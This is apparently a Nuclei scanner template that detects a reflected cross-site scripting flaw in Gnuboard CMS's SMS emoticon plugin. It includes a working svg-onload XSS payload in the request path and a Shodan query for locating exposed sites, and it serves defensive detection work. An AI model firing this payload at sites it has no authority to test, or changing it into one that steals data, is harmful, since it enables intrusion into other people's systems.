id: gnuboard-sms-xss

info:
  name: Gnuboard CMS - Cross-Site Scripting
  author: gy741
  severity: medium
  description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
  reference:
    - https://sir.kr/g5_pds/4788?page=5
    - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
    cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Gnuboard"
    product: gnuboard5
    vendor: gnuboard
  tags: xss,gnuboard

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"0nuboard<svg onload=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008ec848d0db194d823d2489a0f2ce4a1252332467e04601c99ae63c39857c62e102206003fbd736b33305083848192c6a3bdfe4969aad1cf05d805b5ca211de7a3588:922c64590222798bb761d5b6d8e72950